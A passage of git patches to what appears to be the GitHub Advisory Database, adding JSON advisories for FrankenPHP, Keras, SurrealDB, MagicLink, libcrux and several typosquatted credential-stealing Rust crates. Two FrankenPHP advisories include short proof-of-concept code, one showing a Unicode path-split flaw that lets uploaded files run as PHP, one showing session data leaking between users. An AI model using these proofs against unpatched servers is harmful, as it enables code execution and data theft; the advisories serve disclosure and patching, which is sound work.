calculated on `lowerPath` will be larger than the corresponding visual point in the original `path`. When applied to the original path, the split occurs at the wrong byte offset. This can cause the server to treat a larger portion of the path as the script name, effectively allowing an attacker to manipulate `SCRIPT_FILENAME`.\n\n### **PoC**\n\nThe following Go program demonstrates the discrepancy between the byte index in the lowercased string versus the original string.\n\n1. Save the following as `poc.go`:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"strings\"\n)\n\nfunc splitPos(path string, split string) int {\n lowerPath := strings.ToLower(path)\n idx := strings.Index(lowerPath, strings.ToLower(split))\n if idx < 0 {\n return -1\n }\n return idx + len(split)\n}\n\nfunc main() {\n // U+023A: Ⱥ (UTF-8: C8 BA). Lowercase is ⱥ (UTF-8: E2 B1 A5), longer in bytes.\n // We construct a path where the byte expansion shifts the index.\n path := \"/ȺȺȺȺshell.php.txt.php\"\n split := \".php\"\n\n pos := splitPos(path, split)\n\n fmt.Printf(\"orig bytes=%d\\n\", len(path))\n fmt.Printf(\"lower bytes=%d\\n\", len(strings.ToLower(path)))\n fmt.Printf(\"splitPos=%d\\n\", pos)\n\n // Current Unsafe Behavior:\n fmt.Printf(\"orig[:pos] (Calculated Script)=%q\\n\", path[:pos])\n fmt.Printf(\"orig[pos:] (Calculated PathInfo)=%q\\n\", path[pos:])\n\n // Expected Safe Behavior:\n want := strings.Index(path, split) + len(split)\n fmt.Printf(\"expected splitPos=%d\\n\", want)\n fmt.Printf(\"expected orig[:]=%q\\n\", path[:want])\n}\n```\n\n2. Run the PoC:\n\n```console\ngo run poc.go\n```\n\n3. **Output:**\n\n```text\norig bytes=26\nlower bytes=30\nsplitPos=22\norig[:pos]=\"/ȺȺȺȺshell.php.txt\"\norig[pos:]=\".php\"\nexpected splitPos=18\nexpected orig[:]=\"/ȺȺȺȺshell.php\"\n```\n\nIn this example, FrankenPHP would identify `/ȺȺȺȺshell.php.txt` as the PHP script to execute, ignoring the fact that the actual file extension in the file system might be `.txt`.\n\n### Impact*\n\nThis is a **Security Boundary Bypass** and **Path Confusion** vulnerability.\n\nIn setups where users can upload files (e.g., avatars, text files) that are stored within the document root or a reachable path, an attacker can upload a file containing malicious PHP code with a safe extension (e.g., `payload.txt`). By crafting a request with specific Unicode characters, the attacker can force FrankenPHP to calculate the `SCRIPT_FILENAME` as ending in `payload.txt`, while the request appears to contain `.php` to the internal router logic.\n\nThis results in the execution of non-PHP files as PHP scripts, leading to **Remote Code Execution (RCE)**.\n\n### **Patched Versions**\n\n* This issue is fixed in FrankenPHP version **1.11.2**.\n\n### **Workarounds**\n\n* Ensure that user-uploaded files are stored outside of the public document root.\n* Implement strict WAF rules to reject requests containing specific multi-byte Unicode characters in the URL path if an upgrade is not immediately possible.", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [ { "package": { @@ -35,6 +40,10 @@ "type": "WEB", "url": "https://github.com/php/frankenphp/security/advisories/GHSA-g966-83w7-6w38" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24895" + }, { "type": "WEB", "url": "https://github.com/php/frankenphp/commit/04fdc0c1e8fde94e2c1ad86217e962c88d27c53e" @@ -56,6 +65,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:29:36Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T20:16:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json b/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json index 0c1b2cb68df0a..1038e2dc372c1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json +++ b/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-px4r-g4p3-hhqv", - "modified": "2026-02-12T15:29:02Z", + "modified": "2026-02-12T22:07:35Z", "published": "2026-02-12T15:29:01Z", "aliases": [ "CVE-2026-21435" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-px4r-g4p3-hhqv" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21435" + }, { "type": "PACKAGE", "url": "https://github.com/quic-go/webtransport-go" @@ -59,6 +63,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:29:01Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T19:15:51Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json b/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json index b0d0b8c621cb2..0864878d6fb96 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json +++ b/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-r3xh-3r3w-47gp", - "modified": "2026-02-12T15:29:30Z", + "modified": "2026-02-12T22:07:50Z", "published": "2026-02-12T15:29:30Z", "aliases": [ "CVE-2026-24894" ], "summary": "FrankenPHP leaks session data between requests in worker mode", "details": "### Summary\n\nWhen running FrankenPHP in **worker mode**, the `$_SESSION` superglobal is not correctly reset between requests. This allows a subsequent request processed by the same worker to access the `$_SESSION` data of the previous request (potentially belonging to a different user) before `session_start()` is called.\n\n### Details\n\nIn standard PHP execution, the environment is torn down completely after every request. In FrankenPHP's worker mode, the application stays in memory, and superglobals are manually reset between requests.\n\nThe vulnerability exists because `$_SESSION` is stored in the Zend Engine's symbol table (`EG(symbol_table)`). While the standard PHP request shutdown (RSHUTDOWN) decrements the reference count of the session data, it does not remove the `$_SESSION` variable itself from the symbol table. FrankenPHP's reset logic (`frankenphp_reset_super_globals`) previously cleared other superglobals but failed to explicitly delete `$_SESSION`.\n\nConsequently, until `session_start()` is called in the new request (which re-initializes the variable), the `$_SESSION` array retains the data from the previous request processed by that specific worker thread.\n\n### Impact\n\nThis is a **cross-request data leakage** vulnerability.\n\n* **Confidentiality:** If an application reads `$_SESSION` before calling `session_start()`, it can access sensitive information (authentication tokens, user IDs, PII) belonging to the previous user.\n* **Logic Errors / Impersonation:** If application logic relies on `$_SESSION` being empty or unset to detect a \"guest\" state, or checks for specific keys in `$_SESSION` prior to session initialization, a malicious actor (or accidental race condition) could trigger privilege escalation or user impersonation.\n\nThis affects only users running FrankenPHP in **worker mode** and not `session_start()` for each request, which is done by default by most frameworks.\n\n### PoC\n\nThe following steps demonstrate the issue (derived from the regression tests added in the fix):\n\n1. **Client A** sends a request that starts a session and sets sensitive data:\n\n```php\n// Request 1\nsession_start();\n$_SESSION['secret'] = 'AliceData';\nsession_write_close();\n```\n\n2. **Client B** (or the same client without cookies) sends a request to the same worker. This script checks `$_SESSION` *without* starting a session:\n\n```php\n// Request 2\n// session_start() is NOT called\nif (!empty($_SESSION)) {\n echo \"Leaked Data: \" . $_SESSION['secret'];\n}\n```\n\n\n3. **Result:** Client B receives \"Leaked Data: AliceData\".\n\n### Workarounds\n\n* Ensure `session_start()` is called immediately at the entry point of your worker script to overwrite any residual data (though this may not cover all edge cases if middleware runs before the controller).\n* Manually unset `$_SESSION` at the very beginning of the worker loop, before handling the request.", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [ { "package": { @@ -35,6 +40,10 @@ "type": "WEB", "url": "https://github.com/php/frankenphp/security/advisories/GHSA-r3xh-3r3w-47gp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24894" + }, { "type": "WEB", "url": "https://github.com/php/frankenphp/commit/24d6c991a7761b638190eb081deae258143e9735" @@ -57,6 +66,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:29:30Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T20:16:10Z" } } \ No newline at end of file From 8a98ba61edade01a662f7c5b059eaf118801fdcc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 22:11:10 +0000 Subject: [PATCH 051/215] Publish Advisories GHSA-6v2j-vr4h-f632 GHSA-gfmx-qqqh-f38q GHSA-xp79-9mxw-878j --- .../GHSA-6v2j-vr4h-f632.json | 43 +++++++++++++++++++ .../GHSA-gfmx-qqqh-f38q.json | 35 ++++++++++++--- .../GHSA-xp79-9mxw-878j.json | 43 +++++++++++++++++++ 3 files changed, 116 insertions(+), 5 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-6v2j-vr4h-f632/GHSA-6v2j-vr4h-f632.json rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json (57%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-xp79-9mxw-878j/GHSA-xp79-9mxw-878j.json diff --git a/advisories/github-reviewed/2026/02/GHSA-6v2j-vr4h-f632/GHSA-6v2j-vr4h-f632.json b/advisories/github-reviewed/2026/02/GHSA-6v2j-vr4h-f632/GHSA-6v2j-vr4h-f632.json new file mode 100644 index 0000000000000..3517b2e733e13 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-6v2j-vr4h-f632/GHSA-6v2j-vr4h-f632.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6v2j-vr4h-f632", + "modified": "2026-02-12T22:10:47Z", + "published": "2026-02-12T22:10:47Z", + "aliases": [], + "summary": "`finch_cli_rust` was removed from crates.io for malicious code", + "details": "This attempts to typosquat the existing crate [`finch_cli`](https://crates.io/crates/finch_cli) to steal credentials from local files.\n\nThe malicious crate had 1 version published on 2025-12-08 and had been downloaded 18 times. There were no crates depending on this crate on crates.io.\n\nThanks to Matthias Zepper of [NGI Sweden](https://ngisweden.scilifelab.se/) for reporting this to the crates.io team!", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "finch_cli_rust" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2025-0152.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-506" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:10:47Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json b/advisories/github-reviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json similarity index 57% rename from advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json rename to advisories/github-reviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json index 6c5d21dcf11a0..48c4e2f9cb18b 100644 --- a/advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json +++ b/advisories/github-reviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json @@ -1,19 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-gfmx-qqqh-f38q", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T22:09:52Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2026-1669" ], + "summary": "Keras vulnerable to arbitrary file read in the model loading mechanism (HDF5 integration)", "details": "Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "last_affected": "3.13.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keras-team/keras" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-73" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:09:52Z", "nvd_published_at": "2026-02-11T23:16:03Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xp79-9mxw-878j/GHSA-xp79-9mxw-878j.json b/advisories/github-reviewed/2026/02/GHSA-xp79-9mxw-878j/GHSA-xp79-9mxw-878j.json new file mode 100644 index 0000000000000..3daa2145badc2 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xp79-9mxw-878j/GHSA-xp79-9mxw-878j.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp79-9mxw-878j", + "modified": "2026-02-12T22:10:23Z", + "published": "2026-02-12T22:10:23Z", + "aliases": [], + "summary": "`finch-rst` was removed from crates.io for malicious code", + "details": "This attempts to typosquat the existing crate [`finch`](https://crates.io/crates/finch) to steal credentials from local files.\n\nThe malicious crate had 1 version published on 2025-12-08 and had been downloaded 21 times. There were no crates depending on this crate on crates.io.\n\nThanks to Matthias Zepper of [NGI Sweden](https://ngisweden.scilifelab.se/) for reporting this to the crates.io team!", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "finch-rst" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2025-0150.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-506" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:10:23Z", + "nvd_published_at": null + } +} \ No newline at end of file From 7899f8c0bdc934728d56c42b54a1f571eed79c8e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 22:12:59 +0000 Subject: [PATCH 052/215] Publish Advisories GHSA-435g-fcv3-8j26 GHSA-r33w-fg8j-9c94 GHSA-vgr2-r5hm-f6gf GHSA-xx7m-69ff-9crp --- .../GHSA-435g-fcv3-8j26.json | 122 ++++++++++++++++++ .../GHSA-r33w-fg8j-9c94.json | 59 +++++++++ .../GHSA-vgr2-r5hm-f6gf.json | 43 ++++++ .../GHSA-xx7m-69ff-9crp.json | 90 +++++++++++++ 4 files changed, 314 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-435g-fcv3-8j26/GHSA-435g-fcv3-8j26.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-r33w-fg8j-9c94/GHSA-r33w-fg8j-9c94.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-vgr2-r5hm-f6gf/GHSA-vgr2-r5hm-f6gf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-xx7m-69ff-9crp/GHSA-xx7m-69ff-9crp.json diff --git a/advisories/github-reviewed/2026/02/GHSA-435g-fcv3-8j26/GHSA-435g-fcv3-8j26.json b/advisories/github-reviewed/2026/02/GHSA-435g-fcv3-8j26/GHSA-435g-fcv3-8j26.json new file mode 100644 index 0000000000000..145e3a3dcb398 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-435g-fcv3-8j26/GHSA-435g-fcv3-8j26.json @@ -0,0 +1,122 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-435g-fcv3-8j26", + "modified": "2026-02-12T22:12:14Z", + "published": "2026-02-12T22:12:14Z", + "aliases": [], + "summary": "Bug-Fixes in `libcrux-ecdh`, `libcrux-ed25519`, `libcrux-psq`", + "details": "In accordance with our [security policy for `libcrux`](https://github.com/cryspen/libcrux/blob/main/SECURITY.md), we publish a GitHub security advisory for any releases whose CHANGELOG includes bug-fixes, and encourage our users to upgrade. The latest releases of the `libcrux-ecdh`, `libcrux-ed25519` and `libcrux-psq` crates contain the following bug-fixes:\n\n## `libcrux-ecdh`\n\n- [#1301](https://github.com/cryspen/libcrux/pull/1301): Check length and clamping in X25519 secret validation. This is a breaking change since errors are now raised on unclamped X25519 secrets or inputs of the wrong length\n\n## `libcrux-ed25519`\n\n- [#1320](https://github.com/cryspen/libcrux/pull/1320): Remove duplicated clamping step during key generation\n\nThe issue fixed in #1320 was first reported by Nadim Kobeissi.\n## `libcrux-psq`\n\n- [#1319](https://github.com/cryspen/libcrux/pull/1319): Propagate AEADError instead of panicking\n- [#1301](https://github.com/cryspen/libcrux/pull/1301): Fix broken clamping check for imported X25519 secret keys\n\nThe issue fixed in #1319 was first reported by Nadim Kobeissi.", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "libcrux-ecdh" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.0.5" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "libcrux-ed25519" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.0.5" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "libcrux-psq" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.0.6" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/security/advisories/GHSA-435g-fcv3-8j26" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/pull/1301" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/pull/1319" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/pull/1320" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/commit/4d6f5d3c2542b6179a6474dec8cfb8b8ddf31a84" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/commit/a09022c5811ca7fd1c6d9a239ff294d64ee86734" + }, + { + "type": "WEB", + "url": "https://github.com/cryspen/libcrux/commit/f303b6446c19fe9a7c993f61e426023609cd5fac" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cryspen/libcrux" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:12:14Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r33w-fg8j-9c94/GHSA-r33w-fg8j-9c94.json b/advisories/github-reviewed/2026/02/GHSA-r33w-fg8j-9c94/GHSA-r33w-fg8j-9c94.json new file mode 100644 index 0000000000000..c187801418e17 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r33w-fg8j-9c94/GHSA-r33w-fg8j-9c94.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r33w-fg8j-9c94", + "modified": "2026-02-12T22:11:56Z", + "published": "2026-02-12T22:11:56Z", + "aliases": [], + "summary": "MagicLink: Insecure Deserialization of MagicLink Actions Leads to Remote Code Execution", + "details": "## Description\n\nMagicLink stores serialized action objects in the `magic_links.action` database column and deserializes them without integrity validation or class allowlisting in [src/MagicLink.php](src/MagicLink.php#L59-L77) and [src/Actions/ResponseAction.php](src/Actions/ResponseAction.php#L64-L77). An attacker with the ability to manipulate database records (e.g., via SQL injection or compromised admin access) could inject malicious serialized objects containing arbitrary closures, leading to Remote Code Execution (RCE) when the magic link is visited.\n\n## Resolution\n\nThe vulnerability has been mitigated through HMAC-signed serialization using the application key, class allowlisting restricted to `ActionAbstract` subclasses and framework classes, strict type validation preventing arbitrary object storage, and backward compatibility support for legacy data via `allowed_classes` in `unserialize()`. Implementation includes a new [Serializable](src/Security/Serializable/Serializable.php) security class with signing/verification, refactored getter/setter methods in MagicLink.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "cesargb/laravel-magiclink" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.25.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/cesargb/laravel-magiclink/security/advisories/GHSA-r33w-fg8j-9c94" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cesargb/laravel-magiclink" + }, + { + "type": "WEB", + "url": "https://github.com/cesargb/laravel-magiclink/releases/tag/v2.25.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:11:56Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-vgr2-r5hm-f6gf/GHSA-vgr2-r5hm-f6gf.json b/advisories/github-reviewed/2026/02/GHSA-vgr2-r5hm-f6gf/GHSA-vgr2-r5hm-f6gf.json new file mode 100644 index 0000000000000..3b665361f5454 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-vgr2-r5hm-f6gf/GHSA-vgr2-r5hm-f6gf.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgr2-r5hm-f6gf", + "modified": "2026-02-12T22:11:08Z", + "published": "2026-02-12T22:11:08Z", + "aliases": [], + "summary": "`sha-rst` was removed from crates.io for malicious code", + "details": "This crate was used as a dependency by `finch_cli_rust` and `finch-rst` and contained a malware payload to exfiltrate credentials.\n\nThe malicious crate had 1 version published on 2025-12-08 and had been downloaded 22 times. Other than the other crates above that were part of the attack, no other crates depedended on this crate.\n\nThanks to Matthias Zepper of [NGI Sweden](https://ngisweden.scilifelab.se/) for reporting this to the crates.io team!", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "sha-rst" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2025-0151.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-506" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:11:08Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xx7m-69ff-9crp/GHSA-xx7m-69ff-9crp.json b/advisories/github-reviewed/2026/02/GHSA-xx7m-69ff-9crp/GHSA-xx7m-69ff-9crp.json new file mode 100644 index 0000000000000..c598681c86c76 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xx7m-69ff-9crp/GHSA-xx7m-69ff-9crp.json @@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xx7m-69ff-9crp", + "modified": "2026-02-12T22:11:48Z", + "published": "2026-02-12T22:11:48Z", + "aliases": [], + "summary": "SurrealDB vulnerable to Denial of Service through scripting function memory edge case", + "details": "In SurrealDB instances with the scripting capability enabled (`--allow-scripting`), users with the ability to run arbitrary queries can trigger a server crash due to a memory-safety bug in the underlying JS engine. The SurrealDB instance terminates instantly, requiring a manual restart.\n\nThe query consists of using built-in string functions to construct a large string and passing it to the JavaScript runtime for compilation. The exact string size required to trigger the crash varies between SurrealDB versions.\n\nWhilst exploiting the vulnerability requires users to be able to run arbitrary queries, if guest access (`--allow-guests`), is enabled, then guests can perform this attack.\n\n### Impact\n\nAny user able to execute queries on a SurrealDB instance with scripting enabled (`--allow-scripting`) can cause complete denial of service. The server process terminates immediately without graceful shutdown.\n\nThe underlying cause of the vulnerability is a null pointer dereference in the `QuickJS-NG` v0.8 JavaScript engine, this vulnerability cannot be exploited to execute arbitrary code, or compromise the integrity or confidentiality of data. \n\n### Patches\n\nVersions prior to SurrealDB `v2.6.1` and `v3.0.0-beta.3` are vulnerable.\n\nThe patches for SurrealDB `v2.6.1` and `v3.0.0-beta.3` update the `rquickjs` dependency from `v0.9.0` to `v0.11.0`, which in turn uses an updated version of `QuickJS-NG`.\n\n### Workarounds\nDeny execution of embedded scripting functions through the configuration of [capabilities](https://surrealdb.com/docs/surrealdb/security/capabilities#capabilities) by starting SurrealDB with the `--deny-scripting` flag or the equivalent environment variable `SURREAL_CAPS_DENY_SCRIPT=true`. This has a usability implication, although scripting functions are disabled by default.\n\nAdministrators can also use `--deny-arbitrary-query` to deny arbitrary querying by either `guest`, `record` or `system` users, or a combination of those, with impacts to functionality for those users. \n\n### Links ###\n[SurrealDB Documentation - Capabilities](https://surrealdb.com/docs/surrealdb/security/capabilities)\n[SurrealDB Documentation - Guest Access](https://surrealdb.com/docs/surrealdb/security/capabilities#guest-access)\n[SurrealQL Documentation - Scripting Functions](https://surrealdb.com/docs/surrealql/functions/script)\n[quickjs-ng v0.9 Release Notes](https://github.com/quickjs-ng/quickjs/releases/tag/v0.9.0)\nhttps://github.com/surrealdb/surrealdb/pull/6833\nhttps://github.com/surrealdb/surrealdb/pull/6774", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "surrealdb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "surrealdb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0-alpha.8" + }, + { + "fixed": "3.0.0-beta.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/surrealdb/surrealdb/security/advisories/GHSA-xx7m-69ff-9crp" + }, + { + "type": "WEB", + "url": "https://github.com/surrealdb/surrealdb/pull/6774" + }, + { + "type": "WEB", + "url": "https://github.com/surrealdb/surrealdb/pull/6833" + }, + { + "type": "WEB", + "url": "https://github.com/surrealdb/surrealdb/commit/2b0389b92398d9ecff4632cd51bbf8303832a988" + }, + { + "type": "WEB", + "url": "https://github.com/surrealdb/surrealdb/commit/bcd2ece9ef0d721215f06a47280698669f332285" + }, + { + "type": "PACKAGE", + "url": "https://github.com/surrealdb/surrealdb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:11:48Z", + "nvd_published_at": null + } +} \ No newline at end of file From b14027fec90e5761016322db47b0b81e5897d2e4 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 22:14:48 +0000 Subject: [PATCH 053/215] Publish Advisories GHSA-3c9m-gq32-g4jx GHSA-jr94-gj3h-c8rf GHSA-p773-8mf4-rjm5 --- .../GHSA-3c9m-gq32-g4jx.json | 65 ++++++++++++++ .../GHSA-jr94-gj3h-c8rf.json | 88 +++++++++++++++++++ .../GHSA-p773-8mf4-rjm5.json | 33 ++++++- 3 files changed, 182 insertions(+), 4 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-3c9m-gq32-g4jx/GHSA-3c9m-gq32-g4jx.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json (65%) diff --git a/advisories/github-reviewed/2026/02/GHSA-3c9m-gq32-g4jx/GHSA-3c9m-gq32-g4jx.json 